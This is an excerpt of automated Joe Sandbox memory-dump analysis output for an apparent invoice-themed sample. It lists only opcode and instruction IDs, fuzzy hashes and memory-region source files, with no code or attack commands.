                                                                                              • Instruction Fuzzy Hash: 2891D071A05248DFCB14DFA8E8596AEBFF2FF89310F1484AAD845E7251DB34AC05CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b9136edc1adca66d172c6b66aa5c3f19f5aa603038fea85fd52c7f9065cc1a81
                                                                                              • Instruction ID: 49766bf53ecabc946f981cb652466e2092c79f31410dc46c303c07a32d0a500a
                                                                                              • Opcode Fuzzy Hash: b9136edc1adca66d172c6b66aa5c3f19f5aa603038fea85fd52c7f9065cc1a81
                                                                                              • Instruction Fuzzy Hash: 0791E77190060ADFCB45DFA8C880999FBF5FF49310B14879AE859EB255EB70ED85CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1d72d8bc82a5fc9359ee9004faac75234ec25296d2bdf8bdf1f3cbb7ced19bef
                                                                                              • Instruction ID: f260d3b2ccd35f4b74880038d4fe561e3b75952aedf03f28410415228a592bba
                                                                                              • Opcode Fuzzy Hash: 1d72d8bc82a5fc9359ee9004faac75234ec25296d2bdf8bdf1f3cbb7ced19bef
                                                                                              • Instruction Fuzzy Hash: 17519C34706254CFCB19DF69C894AAD7BF2BF8A641B1404ADD806EB361DB35EC01CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c5ba7efe3a49b6be968a108e48f8ce4379d6b4d225043e55199bf23803ffd493
                                                                                              • Instruction ID: 9f1f2406791065fb5a47792cc2ed9deb29dc217197d177d16acc54dc561293ee
                                                                                              • Opcode Fuzzy Hash: c5ba7efe3a49b6be968a108e48f8ce4379d6b4d225043e55199bf23803ffd493
                                                                                              • Instruction Fuzzy Hash: 18712C7190071ADFCB11DF68C8809A9FBB5FF49310B148B9AD859EB255EB70E985CBC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2d298259fd3ffbaf7bf10afeff5a4abaa24b9f063d3991188f5d91c98c26d5e9
                                                                                              • Instruction ID: 9d36dc6d1e504d54c950441f60a15874a17701bb35ab387bd28726d18c1d1429
                                                                                              • Opcode Fuzzy Hash: 2d298259fd3ffbaf7bf10afeff5a4abaa24b9f063d3991188f5d91c98c26d5e9
                                                                                              • Instruction Fuzzy Hash: BC6139306146408FDB15DF39C898BA97BB2FF89310F0445BDD446AF2A5DB74AC45CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6a2229723afa784a16cf7827002be48cdc394f8c4d6532dafaf1a4f4b9d2ec7d
                                                                                              • Instruction ID: 9a3ee8acfd8abe5aed00ff1054b3f1c78324d070d9a59db632a8a38607f425db
                                                                                              • Opcode Fuzzy Hash: 6a2229723afa784a16cf7827002be48cdc394f8c4d6532dafaf1a4f4b9d2ec7d
                                                                                              • Instruction Fuzzy Hash: 7D719174A002068FCB44CF68D5859A9FBF1FF49314B4986AAE84ADB312D774EC85CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9fe30f992ea540959cb20470d45ad042c655ede6c77a02cc46f06e78a9c02075
                                                                                              • Instruction ID: fc9655dd2ece91be8f45ea8496a211b93d82b316425724b7f8edbd60d6f9916c
                                                                                              • Opcode Fuzzy Hash: 9fe30f992ea540959cb20470d45ad042c655ede6c77a02cc46f06e78a9c02075
                                                                                              • Instruction Fuzzy Hash: A1518371E102499FCF14DFA9D809AAFBBF6EFC8300F10842AD855E3250EB349905CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf4dc8075bd76d1053dc0a05d74f9c2347ff403a64f2fba96dc6ad6273aad92e
                                                                                              • Instruction ID: 05c5ba62e33593fb50be2e8c99e56f3c48c38b004032d3ec6c5232a6df1665ab
                                                                                              • Opcode Fuzzy Hash: bf4dc8075bd76d1053dc0a05d74f9c2347ff403a64f2fba96dc6ad6273aad92e
                                                                                              • Instruction Fuzzy Hash: 94414B35A00219CFDB11EFA8E849AAEBBF5FB48314F148026D805FB360DB749D46CB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 39607f9a54eba32e631e9caeeb19cc28bda39cf0321dd480de27dec5a09529cf
                                                                                              • Instruction ID: 5a6c7b0212099d194a2ecf4d3622cfb1f0275a6725321470170310a60397485b
                                                                                              • Opcode Fuzzy Hash: 39607f9a54eba32e631e9caeeb19cc28bda39cf0321dd480de27dec5a09529cf
                                                                                              • Instruction Fuzzy Hash: 6C412975A0020ADFCB04DFA9D4819AAFBB5FF49314B158695E918AB311E730AD46CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f1a7b773a965f96c2bf1a8f51671a7727f130b1a98bcecd6cba77393a80eab8a
                                                                                              • Instruction ID: 1736143038e68f093dbe73bbc753e97a47e800f946eaedbdb15c8115046f7176
                                                                                              • Opcode Fuzzy Hash: f1a7b773a965f96c2bf1a8f51671a7727f130b1a98bcecd6cba77393a80eab8a
                                                                                              • Instruction Fuzzy Hash: A6417134A10709CFCB05DF78C8949DDBBB2FF89300F014599E555AB325EB70AA46CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 80734e6c3e58972315f4db761570267b9f33d8dc7d3176e127905cd818b9b4d3
                                                                                              • Instruction ID: b203bf416c53624e4ad7e61e5299707c4f25174648834f05ad5ae6d23723ec6a
                                                                                              • Opcode Fuzzy Hash: 80734e6c3e58972315f4db761570267b9f33d8dc7d3176e127905cd818b9b4d3
                                                                                              • Instruction Fuzzy Hash: 2C414E34A10709CFCB14EFB8C88499DF7B6FF89304F118559E519AB325EB71AA85CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b637de8bb95c3f440be528fd2f082e162e8cb7dbd6fc49020189ac16d31208f
                                                                                              • Instruction ID: f12a617fe6e347502cf4b8d147badd44e65c45763ab9f8a275a5b81cb8342e0c
                                                                                              • Opcode Fuzzy Hash: 9b637de8bb95c3f440be528fd2f082e162e8cb7dbd6fc49020189ac16d31208f
                                                                                              • Instruction Fuzzy Hash: EA41D0B1D00349DFDB24DFA9C989A9DFBB5FF48304F24811AD818AB211D7756A89CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 30cd081641303e560288fd34464d0ef819730b76bafee168777438378d94e6ae
                                                                                              • Instruction ID: 3ce94c5b01e9b2e1deccd97320a1e318a84dfae9e24d7ed5feaee015961bb6e5
                                                                                              • Opcode Fuzzy Hash: 30cd081641303e560288fd34464d0ef819730b76bafee168777438378d94e6ae
                                                                                              • Instruction Fuzzy Hash: 8D31A135A112198FCF04EBB8E8548EDF7B2FF89210B048569E905AB310EB70AD46CFC0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 08372d148ad47539e2701155af703f7594dfac88d87dc5cc1d1e7a2a862b0a76
                                                                                              • Instruction ID: 06885758326e54d1a24ce0c7abf9bba044fc425ddab2f3886ad1aae789294583
                                                                                              • Opcode Fuzzy Hash: 08372d148ad47539e2701155af703f7594dfac88d87dc5cc1d1e7a2a862b0a76
                                                                                              • Instruction Fuzzy Hash: 9741C0B1D00349DBDB24DFA9C984A8DBBB5BF48304F24812AD918AB215D7756A89CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 040a0b8d1712560756b625b0042f1656c7d7157e81c12e0ddfdf1fae5008dc09
                                                                                              • Instruction ID: a4c9f9cd4e9807acb59b3850e96074008ae8706400639bdf4dd58e4375f3a186
                                                                                              • Opcode Fuzzy Hash: 040a0b8d1712560756b625b0042f1656c7d7157e81c12e0ddfdf1fae5008dc09
                                                                                              • Instruction Fuzzy Hash: 95412874A04246CFC715CF28C585AA9FBF1FF49314B4986AAD84ADB362D770EC85CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cd5eed46277d7db6f4104f75bd86e67cb3569c66d54fdefe915de9eb12aa8630
                                                                                              • Instruction ID: 1d48871fe671cb48fc03644a43e7072abe436985264c2aed4e1a4643065df00b
                                                                                              • Opcode Fuzzy Hash: cd5eed46277d7db6f4104f75bd86e67cb3569c66d54fdefe915de9eb12aa8630
                                                                                              • Instruction Fuzzy Hash: EF41C1B0C00359DFCB14CF9AC889A9EFBB5FF89710F60811AE818AB224DB745845CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15ffc598842bbd279f2be19b3550eb15fce5757baa86e4ebb5777745c3af94f6
                                                                                              • Instruction ID: 4da5d084c15e2ec531a126f9f7d622648a4462e46275e7aa81697e01581ce09b
                                                                                              • Opcode Fuzzy Hash: 15ffc598842bbd279f2be19b3550eb15fce5757baa86e4ebb5777745c3af94f6
                                                                                              • Instruction Fuzzy Hash: 89410675A0020ADFCB40DFA9D88499EFBB5FF49310B14C659E918AB311E730AD85CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d6f406b4e9c72661cc6d0143d91a03ac83849bf4a626165090f08f3c3b7eb5e4
                                                                                              • Instruction ID: 8e194ebeb1ad971ee34c0e4bd1eec13673a3762c1e227bf5ab1d14774a5a41d3
                                                                                              • Opcode Fuzzy Hash: d6f406b4e9c72661cc6d0143d91a03ac83849bf4a626165090f08f3c3b7eb5e4
                                                                                              • Instruction Fuzzy Hash: 4E21B4723142018FD7149B2DC88A6697BE5FFC5721B1984B9E90ACF3B6DA35DD0187D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 00e26e05443e8187b978ee37f84fcecae62aacc8d5ec2ea453a899f0c6f3af40
                                                                                              • Instruction ID: 341e7ad62df382212b67f5e929a4c87bc0257ba24a9f2e17d7d5504c12c3a51e
                                                                                              • Opcode Fuzzy Hash: 00e26e05443e8187b978ee37f84fcecae62aacc8d5ec2ea453a899f0c6f3af40
                                                                                              • Instruction Fuzzy Hash: B63125716043008FCB11EF79D45889ABBF6FF85200B1588AED505DB3A1EB74EC0ACB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fb725f513e919a5fd642730bfb4e8b03790ebcc57783f52a18ab5e0683d75d21
                                                                                              • Instruction ID: 19ff556b8ef6168c95295339f44370ae4cebd6d13717aed967dfc9977bc2abd5
                                                                                              • Opcode Fuzzy Hash: fb725f513e919a5fd642730bfb4e8b03790ebcc57783f52a18ab5e0683d75d21
                                                                                              • Instruction Fuzzy Hash: 0F21D8307092908FC715DB39D4A456E7FB2FFDA20071948EED486CB366CA349C46C761
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c01d5b62a067e918f9163d6f8687872ff612d1c3f899bc0eaf73658c51cb2d05
                                                                                              • Instruction ID: 4387583fd94f8f5e3ba7c3334138548b7e31a4bfc2688ebd9d667cfc3c79d640
                                                                                              • Opcode Fuzzy Hash: c01d5b62a067e918f9163d6f8687872ff612d1c3f899bc0eaf73658c51cb2d05
                                                                                              • Instruction Fuzzy Hash: B7217371B012455BCF11DBA988499BFBBFAAFC5200F04856AE854E7261EA708E0187E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2196323747.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_143d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6b7a97d01868fa3671e28199c439e0fe3ef57401491b5e9d1a7a9c4c3b15d8b
                                                                                              • Instruction ID: 318caa492c97b588e8e691024d91c49ecbae356acd8039bf093b1e3ecc33dad7
                                                                                              • Opcode Fuzzy Hash: e6b7a97d01868fa3671e28199c439e0fe3ef57401491b5e9d1a7a9c4c3b15d8b
                                                                                              • Instruction Fuzzy Hash: 1521C172904240DFDB06DF98D9C4B27BF65FBCC320F64C56AE9090A266C336D416CBA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2196323747.000000000143D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0143D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_143d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 68df307e43be0c939e5b5b24a35d65c08265bf0d7ce477c72eb00b66561b4637
                                                                                              • Instruction ID: 51c0aa006ef1048123134bedab982959b4ab1074311e68b7609c51851632d37a
                                                                                              • Opcode Fuzzy Hash: 68df307e43be0c939e5b5b24a35d65c08265bf0d7ce477c72eb00b66561b4637
                                                                                              • Instruction Fuzzy Hash: 69210372904240DFDB06DF58D9C0B27BF65FBCC328F64C56AE9090B2A6C336D416CAA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5de8d74cce347265fa83a5f09907ca7ba8ff8a307f079512448a8d0fabf7c6da
                                                                                              • Instruction ID: 67d6eea89ea077f60057dfa0ed2dc31632373df9868e1d5cecbfbd70dd1ea121
                                                                                              • Opcode Fuzzy Hash: 5de8d74cce347265fa83a5f09907ca7ba8ff8a307f079512448a8d0fabf7c6da
                                                                                              • Instruction Fuzzy Hash: 1C2130319047099FCF00EFA9C89599DBBB5FF89300F5145AED545AB222EB30E989CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2196466036.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_144d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 21d0e650c7ce96c468c84990e15196a6b8d156ccc63df097ba430033952df4d1
                                                                                              • Instruction ID: 9fe5927776339f794b85bd182b8963a493f2cecaa3f51f2a65ce21c6512003ff
                                                                                              • Opcode Fuzzy Hash: 21d0e650c7ce96c468c84990e15196a6b8d156ccc63df097ba430033952df4d1
                                                                                              • Instruction Fuzzy Hash: 34213E71904200DFEB06DF98D9C0B16BBA5FB94324F24C56EE9094B366C336D406CB61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2196466036.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_144d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9c1f478d7de5e498aac3de6f75ad7d84f4c37aa993bbafdd9840d178262421fc
                                                                                              • Instruction ID: de347d2d35cd75bc129e6ac20b8f66008fa5eee5494543163ba5e321a1712090
                                                                                              • Opcode Fuzzy Hash: 9c1f478d7de5e498aac3de6f75ad7d84f4c37aa993bbafdd9840d178262421fc
                                                                                              • Instruction Fuzzy Hash: F02125B1904200DFEB15DF98D984B16BB65EB94318F20C56ED90A0B366C33AD407CA61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b260de248dd34866d888d7d6a60c35a942facc99ef168955cdee49920b7d10c6
                                                                                              • Instruction ID: c5d6986ce248e125d92fa224cd061831168d53eefefdac4dcdab18eacbc3f3b8
                                                                                              • Opcode Fuzzy Hash: b260de248dd34866d888d7d6a60c35a942facc99ef168955cdee49920b7d10c6
                                                                                              • Instruction Fuzzy Hash: 4C215071A106099FCB10EF6CD8419DEFBB4FF59311F50C26AE958A7210EB30A998CBD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b718763865c487b367cf4f2506ccaa7fcc72d30d6ce8dc5e024e887ef75f2a91
                                                                                              • Instruction ID: 72b2d1936dfb69032af5f1dc6514da4478a34fd2314b60569907cbf380471268
                                                                                              • Opcode Fuzzy Hash: b718763865c487b367cf4f2506ccaa7fcc72d30d6ce8dc5e024e887ef75f2a91
                                                                                              • Instruction Fuzzy Hash: 622110359007099FCF00EFA9C8859DEFBB5FF89300F518669D5456B225EB70E589CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2196466036.000000000144D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0144D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_144d000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 52060d1b78d0743d11c047b28e472381a4493f28ead98851106e1368f0b5a204
                                                                                              • Instruction ID: 5a3f24d999e639a278da90ab91f39840cc25f69cc0a1e8ce1e844100191ebcbb
                                                                                              • Opcode Fuzzy Hash: 52060d1b78d0743d11c047b28e472381a4493f28ead98851106e1368f0b5a204
                                                                                              • Instruction Fuzzy Hash: 482180755093808FDB17CF64D594716BF71EB46214F28C5DBD8498B2A7C33A980ACB62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fda5804dd36dd82a6c92daee34bb98b7d29f11336604b32a71812a748fd79247
                                                                                              • Instruction ID: 62601672ddd90af6e79e5c6a3b16e7892028ae7a0d6688a6e402220b0dac7016
                                                                                              • Opcode Fuzzy Hash: fda5804dd36dd82a6c92daee34bb98b7d29f11336604b32a71812a748fd79247
                                                                                              • Instruction Fuzzy Hash: A711A3723082414FD715CB2DC8966597FE5EFCA310B1884B9E44ACF3A6DA35DC018780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 546e6198504772c4957d38b17cf870df96e32616c25392bffde52234d9091362
                                                                                              • Instruction ID: 34a61cf027ec938f8d31b37c9d6c16b72e64c6ca3ca2b196729b43e80b850d13
                                                                                              • Opcode Fuzzy Hash: 546e6198504772c4957d38b17cf870df96e32616c25392bffde52234d9091362
                                                                                              • Instruction Fuzzy Hash: C311C2312047458FCB22AB79D4545AABBB5FF86320B4005AEE949D7231EB70ED42CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 69f3ce8ef45c544f52912c6f6dd5b952bf0afa77ad2830b3a1bbb1f3fe78a60d
                                                                                              • Instruction ID: 476c25938568c5675e86382b289a8d2058e252ab8b445afebbe6f71adbb90280
                                                                                              • Opcode Fuzzy Hash: 69f3ce8ef45c544f52912c6f6dd5b952bf0afa77ad2830b3a1bbb1f3fe78a60d
                                                                                              • Instruction Fuzzy Hash: 09216A32D00B5187DB119F2DE854281B761FFA5324F198BBACC4C3F246EBB56984CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2dbc075510ed852d34dea745f4f1b5c349556160f560ab9b7868caa67bef6521
                                                                                              • Instruction ID: 0bf64098ff859adf5f10eb4697779b032a267e7b5ef8b74d0482b226d1efdf7a
                                                                                              • Opcode Fuzzy Hash: 2dbc075510ed852d34dea745f4f1b5c349556160f560ab9b7868caa67bef6521
                                                                                              • Instruction Fuzzy Hash: 201194315046889FCF02CF78D8689D97F71FF4A300B0985E6E544DB266D735E816CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6dc8097a970f130d45addaac201eb04423cd59d250b0cd9b1fe15310b938e8d8
                                                                                              • Instruction ID: 99a7d588f8c11926e68d6bdd722ed1d723c1f42acb1dc0044446fb535b446e0c
                                                                                              • Opcode Fuzzy Hash: 6dc8097a970f130d45addaac201eb04423cd59d250b0cd9b1fe15310b938e8d8
                                                                                              • Instruction Fuzzy Hash: 8C11E571B082948FCF02E7B8DCA55AD7FB59F8A100B0404DAD945EF392EA249D01D7E6
                                                                                              Memory Dump Source
